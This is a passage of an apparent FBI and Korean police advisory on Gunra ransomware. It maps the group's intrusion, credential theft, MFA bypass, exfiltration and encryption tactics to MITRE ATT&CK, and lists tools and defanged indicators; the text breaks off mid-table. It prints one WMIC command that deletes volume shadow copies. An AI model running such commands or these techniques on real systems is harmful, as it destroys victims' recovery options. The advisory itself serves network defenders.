&lt;p&gt;Gunra ransomware appears to be based on, or significantly influenced by, the Conti ransomware source code leaked in 2022.&lt;a href=&quot;#Note4&quot;&gt;&lt;sup&gt;4&lt;/sup&gt;&lt;/a&gt; Initially, Gunra actors’ campaigns focused on Windows environments; reporting in mid-2025 indicated the group introduced a Linux variant and moved toward broader cross-platform targeting.&lt;a href=&quot;#Note5&quot;&gt;&lt;sup&gt;5&lt;/sup&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Initial Access&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The FBI observed Gunra actors obtaining initial access [&lt;a href=&quot;https://attack.mitre.org/versions/v19/tactics/TA0001/&quot; target=&quot;_blank&quot; title=&quot;TA0001&quot;&gt;TA0001&lt;/a&gt;] primarily through the exploitation of known vulnerabilities in internet-facing devices [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1190/&quot; target=&quot;_blank&quot; title=&quot;T1190&quot;&gt;T1190&lt;/a&gt;], including firewall and VPN appliances. The FBI observed exploits based on the following Common Vulnerabilities and Exposures (CVEs):&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://cve.org/CVERecord?id=CVE-2024-55591&quot; title=&quot;CVE-2024-55591&quot;&gt;CVE-2024-55591&lt;/a&gt; [&lt;a href=&quot;https://cwe.mitre.org/data/definitions/288.html&quot; target=&quot;_blank&quot; title=&quot;CWE-288: Authentication Bypass Using an Alternate Path or Channel&quot;&gt;CWE-288: Authentication Bypass Using an Alternate Path or Channel&lt;/a&gt;]: Authentication bypass vulnerability affecting specific FortiOS and FortiProxy versions (see CVE record for more details).&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://cve.org/CVERecord?id=CVE-2025-24472&quot; title=&quot;CVE-2025-24472&quot;&gt;CVE-2025-24472&lt;/a&gt; [&lt;a href=&quot;https://cwe.mitre.org/data/definitions/288.html&quot; target=&quot;_blank&quot; title=&quot;CWE-288: Authentication Bypass Using an Alternate Path or Channel&quot;&gt;CWE-288: Authentication Bypass Using an Alternate Path or Channel&lt;/a&gt;]: Authentication bypass vulnerability affecting specific FortiOS and FortiProxy versions (see CVE record for more details).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Additionally, for initial access, KNPA observed Gunra actors exploit credential-exposure and Secure Shell (SSH) access control vulnerabilities in internet-facing VPN gateways to gain unauthorized remote access.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Execution&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Gunra’s Windows encryptor relies on native operating system (OS) application programming interfaces (APIs) to drive both execution and targeted encryption activity. The binary uses the &lt;code&gt;FindFirstFileW&lt;/code&gt;/&lt;code&gt;FindNextFileW&lt;/code&gt; API calls [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1106&quot; target=&quot;_blank&quot; title=&quot;T1106&quot;&gt;T1106&lt;/a&gt;] to enumerate files and directories on all accessible drive letters (A through Z), enabling comprehensive traversal of the file system prior to encryption of victim data.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Persistence, Privilege Escalation, Lateral Movement, and Command and Control&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Gunra actors regularly exploit Impacket libraries &lt;code&gt;psexec.py&lt;/code&gt; and &lt;code&gt;smbclient.py&lt;/code&gt; to move laterally across victim networks using the Server Message Block (SMB) protocol [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1021/002/&quot; target=&quot;_blank&quot; title=&quot;T1021.002&quot;&gt;T1021.002&lt;/a&gt;].&lt;/p&gt;
&lt;p&gt;KPNA observed that against one victim, Gunra actors gained access to an administrator account for a secure socket layer (SSL)-VPN appliance [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1133/&quot; target=&quot;_blank&quot; title=&quot;T1133&quot;&gt;T1133&lt;/a&gt;] by exploiting default credentials when account lockout controls were not present [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1078/001/&quot; target=&quot;_blank&quot; title=&quot;T1078.001&quot;&gt;T1078.001&lt;/a&gt;][&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1078/002/&quot; target=&quot;_blank&quot; title=&quot;T1078.002&quot;&gt;T1078.002&lt;/a&gt;]. The actors subsequently downloaded OpenSSH (an SSH tunneling tool) [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1105/&quot; target=&quot;_blank&quot; title=&quot;T1105&quot;&gt;T1105&lt;/a&gt;] from an external attacker-controlled server to establish connections between compromised systems and maintain persistence in the victim’s environment [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1572/&quot; target=&quot;_blank&quot; title=&quot;T1572&quot;&gt;T1572&lt;/a&gt;].&lt;/p&gt;
&lt;p&gt;After gaining access to an internet-connected workstation used by a network administrator, Gunra actors accessed the SSL-VPN administrative web console and identified an unused account that had access to both the internet-facing and internal corporate networks. The actors modified the account configuration to bypass the mandatory password change requirement enforced on the account and subsequently leveraged it for malicious activities [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1098/&quot; target=&quot;_blank&quot; title=&quot;T1098&quot;&gt;T1098&lt;/a&gt;].&lt;/p&gt;
&lt;p&gt;Using stolen session information, Gunra actors gained initial access to the internal virtual desktop infrastructure (VDI) environment and conducted lateral movement via RDP [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1021/001/&quot; target=&quot;_blank&quot; title=&quot;T1021.001&quot;&gt;T1021.001&lt;/a&gt;]. The actors pivoted to multiple critical systems, including the VDI authentication web server, the internal Active Directory (AD) server, and virtual desktops assigned to IT personnel.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Credential Access&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The FBI observed multiple instances of Gunra actors using &lt;code&gt;secretsdump.py&lt;/code&gt; (another Impacket library) to conduct OS credential dumping [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1003/003&quot; target=&quot;_blank&quot; title=&quot;T1003.003&quot;&gt;T1003.003&lt;/a&gt;] against compromised domain controllers to extract password hashes of user accounts from the NT Directory Services (NTDS) file. This enabled pass-the-hash [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1550/002/&quot; target=&quot;_blank&quot; title=&quot;T1550.002&quot;&gt;T1550.002&lt;/a&gt;] or pass-the-ticket [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1550/003/&quot; target=&quot;_blank&quot; title=&quot;T1550.003&quot;&gt;T1550.003&lt;/a&gt;] attacks for lateral movement into other privileged systems.&lt;/p&gt;
&lt;p&gt;For one victim, Gunra actors manipulated the network traffic control functionality of an SSL-VPN appliance to collect credentials and session information transmitted by users authenticating to a corporate VDI authentication portal [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1040/&quot; target=&quot;_blank&quot; title=&quot;T1040&quot;&gt;T1040&lt;/a&gt;]. The actors then used stolen session cookies to conduct session hijacking [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1539/&quot; target=&quot;_blank&quot; title=&quot;T1539&quot;&gt;T1539&lt;/a&gt;], impersonating legitimate users to gain access to the internal network.&lt;/p&gt;
&lt;p&gt;For the same victim, the Gunra actors modified authentication processing files on the corporate VDI authentication portal server to allow successful authentication when a specific, Gunra-designated one time password (OTP) value was entered, thereby enabling the continuous bypass of multi-factor authentication (MFA) [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1556/006/&quot; target=&quot;_blank&quot; title=&quot;T1556.006&quot;&gt;T1556.006&lt;/a&gt;].&lt;/p&gt;
&lt;p&gt;Additionally, the actors accessed a Hiware system access control server via SSH from a compromised virtual desktop and stole a symmetric encryption key stored on the server. The stolen key enabled the actors to decrypt passwords for enterprise server accounts stored within the database [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1555/&quot; target=&quot;_blank&quot; title=&quot;T1555&quot;&gt;T1555&lt;/a&gt;] and perform credential dumping of credentials associated with all enterprise servers [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1003/&quot; target=&quot;_blank&quot; title=&quot;T1003&quot;&gt;T1003&lt;/a&gt;].&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Stealth, Defense Impairment, and Discovery&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Gunra employs multiple stealth and defense impairment techniques to hinder detection and analysis. While active within victim networks, Gunra actors typically attempt to mask their presence by deleting system/network access logs [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1685/&quot; target=&quot;_blank&quot; title=&quot;T1685&quot;&gt;T1685&lt;/a&gt;] and clearing command history [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1070/003&quot; target=&quot;_blank&quot; title=&quot;T1070.003&quot;&gt;T1070.003&lt;/a&gt;]. Additionally, to evade administrator detection, Gunra actors primarily conduct malicious activities and internal infrastructure reconnaissance [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1049/&quot; target=&quot;_blank&quot; title=&quot;T1049&quot;&gt;T1049&lt;/a&gt;] during late-night and early-morning hours (10:00 p.m. – 06:00 a.m.) [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1678/&quot; target=&quot;_blank&quot; title=&quot;T1678&quot;&gt;T1678&lt;/a&gt;].&lt;/p&gt;
&lt;p&gt;The ransomware binary is self-contained and performs full volume encryption without observable network indicators (e.g., domain name system, HTTP).&lt;a href=&quot;#Note6&quot;&gt;&lt;sup&gt;6&lt;/sup&gt;&lt;/a&gt; The Windows binary includes the&amp;nbsp;&lt;code&gt;IsDebuggerPresent&lt;/code&gt; API [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1622&quot; target=&quot;_blank&quot; title=&quot;T1622&quot;&gt;T1622&lt;/a&gt;], which defends against reverse engineering by detecting if the application is being run in a debugger.&lt;a href=&quot;#Note7&quot;&gt;&lt;sup&gt;7&lt;/sup&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;To avoid dedicating encryption resources to non-critical files, the binary includes filtering logic to exclude common system directories (e.g.,&amp;nbsp;&lt;code&gt;C:\Windows&lt;/code&gt;,&amp;nbsp;&lt;code&gt;C:\Program Files&lt;/code&gt;,&amp;nbsp;&lt;code&gt;C:\Program Files (x86)&lt;/code&gt;) from the file system reconnaissance [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1679/&quot; target=&quot;_blank&quot; title=&quot;T1679&quot;&gt;T1679&lt;/a&gt;]. For files that pass the initial filter, the binary checks against a second set of filter rules that exclude file extensions related to system-critical files (e.g.,&amp;nbsp;&lt;code&gt;.exe&lt;/code&gt;,&amp;nbsp;&lt;code&gt;.dll&lt;/code&gt;,&amp;nbsp;&lt;code&gt;.sys&lt;/code&gt;). Files with extensions consistent with user data (e.g., documents, databases, images, archives) are approved and added to the work queue for data encryption.&lt;a href=&quot;#Note8&quot;&gt;&lt;sup&gt;8&lt;/sup&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;Prior to encryption, Gunra performs file and directory discovery across all accessible drive letters (A through Z) to identify victim data for targeting [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1083&quot; target=&quot;_blank&quot; title=&quot;T1083&quot;&gt;T1083&lt;/a&gt;].&lt;a href=&quot;#Note9&quot;&gt;&lt;sup&gt;9&lt;/sup&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Collection and Exfiltration&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Prior to data encryption, Gunra actors collect sensitive victim data as part of their double-extortion strategy. The FBI observed actors collecting files from victims that included business-critical documents, databases, personally identifiable information (PII), and internal email communications [&lt;a href=&quot;https://attack.mitre.org/versions/v19/tactics/TA0009/&quot; target=&quot;_blank&quot; title=&quot;TA0009&quot;&gt;TA0009&lt;/a&gt;][&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1114/&quot; target=&quot;_blank&quot; title=&quot;T1114&quot;&gt;T1114&lt;/a&gt;]. Gunra actors’ custom support for filtering redundant system files during initial discovery/file system reconnaissance streamlines the actors’ collection of user-specific data from local victim machines [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1005&quot; target=&quot;_blank&quot; title=&quot;T1005&quot;&gt;T1005&lt;/a&gt;].&lt;/p&gt;
&lt;p&gt;The FBI observed Gunra actors use a malicious executable (&lt;code&gt;main.exe&lt;/code&gt;) to exfiltrate victim data from Microsoft OneDrive and SharePoint [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1530&quot; target=&quot;_blank&quot; title=&quot;T1530&quot;&gt;T1530&lt;/a&gt;]. For at least one known Gunra victim, the actors generated compressed archives with sensitive data [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1560&quot; target=&quot;_blank&quot; title=&quot;T1560&quot;&gt;T1560&lt;/a&gt;] and exfiltrated the archives to the file-sharing service Mega [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1567&quot; target=&quot;_blank&quot; title=&quot;T1567&quot;&gt;T1567&lt;/a&gt;]; the volume of exfiltrated data ranged up to tens of terabytes.&lt;a href=&quot;#Note10&quot;&gt;&lt;sup&gt;10&lt;/sup&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;In addition to collecting business-critical documents, the KNPA identified a victim case in which Gunra actors connected to the VDI environments of IT personnel and collected sensitive documents containing system and network configuration information [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1005/&quot; target=&quot;_blank&quot; title=&quot;T1005&quot;&gt;T1005&lt;/a&gt;]. The actors then leveraged enterprise server credentials stolen from a system access control server to deploy ransomware to encrypt key assets, including database servers and network attached storage (NAS) systems [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1486/&quot; target=&quot;_blank&quot; title=&quot;T1486&quot;&gt;T1486&lt;/a&gt;].&lt;/p&gt;
&lt;p&gt;The FBI observed several common open source tools on Gunra infrastructure that Gunra actors use to facilitate collection and exfiltration of data, including 7-Zip, RClone, and FileZilla [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1048&quot; target=&quot;_blank&quot; title=&quot;T1048&quot;&gt;T1048&lt;/a&gt;] (see &lt;a href=&quot;#LeveragedTools&quot;&gt;&lt;strong&gt;Leveraged Tools&lt;/strong&gt;&lt;/a&gt; for a full list of tools used maliciously by Gunra actors).&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Impact&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Gunra’s double-extortion model relies on both data exfiltration and data encryption for optimal success. The binary achieves high speed file encryption of entire file systems by leveraging a multi-threaded architecture that supports parallel encryption of multiple files simultaneously using strong ChaCha20 + RSA-4096 encryption [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1486/&quot; target=&quot;_blank&quot; title=&quot;T1048&quot;&gt;T1486&lt;/a&gt;]. Upon successful encryption of a file, the binary renames the encrypted file with the file extension&amp;nbsp;&lt;code&gt;.ENCRT&lt;/code&gt;. Gunra also used the &lt;code&gt;.CRYPT&lt;/code&gt; file extension in one documented sample from July 2025.&lt;a href=&quot;#Note11&quot;&gt;&lt;sup&gt;11&lt;/sup&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;After the binary completes the encryption process for all files in a specific directory, Gunra actors write a static ransom note named&amp;nbsp;&lt;code&gt;R3ADM3.txt&lt;/code&gt; to the directory. To avoid unnecessary overhead, the binary also contains logic to prevent encryption of the ransom notes (&lt;code&gt;R3ADM3.txt&lt;/code&gt;) and re-encryption of already encrypted files (&lt;code&gt;.ENCRT&lt;/code&gt;).&lt;a href=&quot;#Note12&quot;&gt;&lt;sup&gt;12&lt;/sup&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;In their ransom notes, Gunra actors typically demand that victims initiate negotiation discussions within five to seven days via a Tor-based negotiation portal or qTox, or risk having their data leaked on Gunra’s DLS. The FBI observed Gunra actors attempting to communicate directly with management staff at victim companies via email to solicit ransom payments with limited success. Gunra actors instructed victims to send ransom payments to specific cryptocurrency wallet addresses [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1657&quot; target=&quot;_blank&quot; title=&quot;T1657&quot;&gt;T1657&lt;/a&gt;] and generally started negotiations at arbitrarily high ransom amounts (over tens of millions in US dollars).&lt;/p&gt;
&lt;p&gt;If Gunra victims do not negotiate or pay ransom, the actors publicly disclose the victims on their DLS and offer a preview of victims’ leaked data. This preview typically includes a directory listing of a victim’s exposed OneDrive and SharePoint files, but not the content of the files. Between June and July of 2025, Gunra actors operated a clearnet mirror of their Tor-based DLS at domain &lt;code&gt;datapub.news&lt;/code&gt;. By March 2026, Gunra had moved their original Tor-based DLS to a different &lt;code&gt;.onion&lt;/code&gt; address. On Gunra’s current Tor-based DLS, the actors advertise the sale of datasets from specific victims and instruct interested parties to contact them via qTox for more information.&lt;/p&gt;
&lt;p&gt;To increase the likelihood of ransom payment and prevent system recovery [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1490/&quot; target=&quot;_blank&quot; title=&quot;T1490&quot;&gt;T1490&lt;/a&gt;], Gunra actors also used Windows Management Instrumentation (WMI) [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1047&quot; target=&quot;_blank&quot; title=&quot;T1047&quot;&gt;T1047&lt;/a&gt;] to initiate deletion of volume shadow copies prior to encryption, as demonstrated in the following example [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1059/003/&quot; target=&quot;_blank&quot; title=&quot;T1059.003&quot;&gt;T1059.003&lt;/a&gt;]:&lt;a href=&quot;#Note13&quot;&gt;&lt;sup&gt;13&lt;/sup&gt;&lt;/a&gt;&lt;sup&gt; &amp;nbsp;&lt;/sup&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where &quot;ID=&#039;{guid of shadowcopy}&#039;&quot; delete&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Additionally, against one Gunra victim, Gunra actors deleted backup and archived data stored on backup infrastructure at both the primary data center and disaster recovery center before and after the ransomware deployment [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1490/&quot; target=&quot;_blank&quot; title=&quot;T1490&quot;&gt;T1490&lt;/a&gt;].&lt;/p&gt;
&lt;h3&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;LeveragedTools&quot;&gt;&lt;strong&gt;Leveraged Tools&lt;/strong&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;#Table1&quot;&gt;&lt;strong&gt;Table 1&lt;/strong&gt;&lt;/a&gt; lists publicly available tools and applications used by Gunra ransomware actors. If network defenders identify use of these tools on their network, they should investigate further to determine possible malicious activity.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt; Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table1&quot;&gt;&lt;/a&gt;Table 1. Tools Used by Gunra Ransomware Actors&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Tool Name&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;FileZilla&lt;/td&gt;
&lt;td&gt;Open source, cross-platform File Transfer Protocol (FTP) application that supports file transfers between devices and remote servers.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Amass&lt;/td&gt;
&lt;td&gt;Open source reconnaissance tool for network mapping and information gathering.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RClone&lt;/td&gt;
&lt;td&gt;Open source command-line program designed to manage files in cloud storage.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sliver&lt;/td&gt;
&lt;td&gt;Penetration testing toolset that allows remote command and control of systems.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7-Zip&lt;/td&gt;
&lt;td&gt;Open source, cross-platform file archiver utility.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WinRAR&lt;/td&gt;
&lt;td&gt;Open source file archiver utility for Microsoft Windows.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DBeaver&lt;/td&gt;
&lt;td&gt;Open source database management tool for managing Structured Query Language (SQL) databases like MySQL, MariaDB, PostgreSQL, SQLite, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Slack&lt;/td&gt;
&lt;td&gt;Cloud-based team communication and collaboration platform.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Visual Studio Code&lt;/td&gt;
&lt;td&gt;Open source extendable source code editor.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MobaXterm&lt;/td&gt;
&lt;td&gt;Windows application with support for multiple remote computing protocols, including SSH, X11, RDP, virtual network computing (VNC), FTP, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AnyDesk&lt;/td&gt;
&lt;td&gt;Common, legitimate remote monitoring and management (RMM) tool that can be used by a cyber actor to obtain remote access and maintain persistence. AnyDesk also supports remote file transfer.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Google Remote Desktop&lt;/td&gt;
&lt;td&gt;Web-based remote desktop software tool developed by Google that runs on a proprietary Google protocol.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mimikatz&lt;/td&gt;
&lt;td&gt;Post-exploitation tool that allows users to access and exfiltrate authentication credentials from Windows systems.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Impacket&lt;/td&gt;
&lt;td&gt;Suite of networking utilities, including&amp;nbsp;&lt;code&gt;smbclient&lt;/code&gt;,&amp;nbsp;&lt;code&gt;psexec&lt;/code&gt;,&amp;nbsp;&lt;code&gt;secretsdump&lt;/code&gt;, etc. Gunra utilized several tools from this suite.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;strong&gt;Indicators of Compromise&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;#Table2&quot;&gt;&lt;strong&gt;Table 2&lt;/strong&gt;&lt;/a&gt; lists IP addresses and domains associated with Gunra ransomware infrastructure since early 2025.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt; Observed IP addresses/domains may be historical in nature. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table2&quot;&gt;&lt;/a&gt;Table 2. IP Addresses/Domains&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;IP Address/Domain&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;First Seen&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Last Seen&amp;nbsp;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;23.239.119[.]2&lt;/td&gt;
&lt;td&gt;&amp;nbsp;July 2025&lt;/td&gt;
&lt;td&gt;Nov. 6, 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;23.239.119[.]3&lt;/td&gt;
&lt;td&gt;July 2025&lt;/td&gt;
&lt;td&gt;&amp;nbsp;Nov. 6, 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;23.239.119[.]4&amp;nbsp;&amp;nbsp;&lt;/td&gt;
&lt;td&gt;July 2025&amp;nbsp;&amp;nbsp;&lt;/td&gt;
&lt;td&gt;Nov. 6, 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;23.239.119[.]5&lt;/td&gt;
&lt;td&gt;July 2025&lt;/td&gt;
&lt;td&gt;Nov. 6, 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;23.239.119[.]6&lt;/td&gt;
&lt;td&gt;July 2025&lt;/td&gt;
&lt;td&gt;Nov. 6, 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;86.54.28[.]216&lt;/td&gt;
&lt;td&gt;June 7, 2025&lt;/td&gt;
&lt;td&gt;July 23, 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;103.125.234[.]14&lt;/td&gt;
&lt;td&gt;Nov. 2025&lt;/td&gt;
&lt;td&gt;Dec. 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;70.36.99[.]82&lt;/td&gt;
&lt;td&gt;Nov. 2025&lt;/td&gt;
&lt;td&gt;Dec. 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;211.21.210[.]181&lt;/td&gt;
&lt;td&gt;Nov. 2025&lt;/td&gt;
&lt;td&gt;Dec. 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;123.184.143[.]105&lt;/td&gt;
&lt;td&gt;Nov. 2025&lt;/td&gt;
&lt;td&gt;Dec. 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;182.204.21[.]240&lt;/td&gt;
&lt;td&gt;Nov. 2025&lt;/td&gt;
&lt;td&gt;Dec. 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;182.204.16[.]112&lt;/td&gt;
&lt;td&gt;Nov. 2025&lt;/td&gt;
&lt;td&gt;Dec. 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;123.244.187[.]144&lt;/td&gt;
&lt;td&gt;Nov. 2025&lt;/td&gt;
&lt;td&gt;Dec. 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;182.204.39[.]118&lt;/td&gt;
&lt;td&gt;Nov. 2025&lt;/td&gt;
&lt;td&gt;Dec. 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;67.43.53[.]10&lt;/td&gt;
&lt;td&gt;Nov. 2025&lt;/td&gt;
&lt;td&gt;Dec. 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;123.246.37[.]108&lt;/td&gt;
&lt;td&gt;Nov. 2025&lt;/td&gt;
&lt;td&gt;Dec. 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;91.201.66[.]146&lt;/td&gt;
&lt;td&gt;Nov. 2025&lt;/td&gt;
&lt;td&gt;Dec. 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Datapub[.]news&lt;/td&gt;
&lt;td&gt;June 2025&lt;/td&gt;
&lt;td&gt;July 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;gunrabxbig445sjqa535uaymzerj6fp4nwc6ngc2xughf2pedjdhk4ad[.]onion&lt;/td&gt;
&lt;td&gt;Apr. 2025&lt;/td&gt;
&lt;td&gt;Feb. 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;lgiil72vkmdtbc3qv4tyq6wedyjxqr2qd4ze7xl2cxgerdnymxj7soqd[.]onion&lt;/td&gt;
&lt;td&gt;Mar. 2026&lt;/td&gt;
&lt;td&gt;July 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;nsnhzysbntsqdwpys6mhml33muccsvterxewh5rkbmcab7bg2ttevjqd[.]onion&lt;/td&gt;
&lt;td&gt;Jan. 2026&lt;/td&gt;
&lt;td&gt;Jan. 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;#Table3&quot;&gt;&lt;strong&gt;Table 3&lt;/strong&gt;&lt;/a&gt; lists email addresses associated with Gunra actors.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table3&quot;&gt;&lt;/a&gt;Table 3. Gunra Email Addresses&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Email Address&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;a00f105546345756@proton[.]me&lt;/td&gt;
